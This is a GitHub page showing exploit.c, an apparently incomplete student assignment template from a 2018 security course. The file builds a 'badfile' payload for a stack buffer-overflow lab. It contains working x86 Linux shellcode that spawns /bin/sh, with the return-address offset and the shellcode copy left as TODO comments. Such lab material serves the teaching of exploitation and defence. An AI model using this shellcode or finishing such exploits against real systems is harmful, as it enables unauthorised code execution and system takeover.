assignment2/exploit.c at master · SE421-Fall2018/assignment2 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
/*
 * This program creates a malicious exploit file for launching a shell
 */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdq                            */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

void main(int argc, char **argv)
{
    // the vulnerable program only reads 517 chars
    // so our exploit should fit in a 517 char array
    char exploit[517];
    FILE *badfile;

    // initialize exploit with 0x90 (NOP instruction)
    memset(&exploit, 0x90, 517);

    // TODO: fill the exploit with appropriate contents here
    // long EIP = 0x41414141; // TODO
    // long OFFSET_TO_EIP = 0; // TODO
    //
    // sets the value for the return address
    // *((long *) (exploit + OFFSET_TO_EIP)) = EIP;
    //
    // places the shellcode towards the end of exploit
    // memcpy(exploit + sizeof(exploit) - sizeof(shellcode), shellcode, sizeof(shellcode));

    // save the contents to the file "badfile"
    badfile = fopen("./badfile", "w");
    fwrite(exploit, 517, 1, badfile);
    fclose(badfile);
}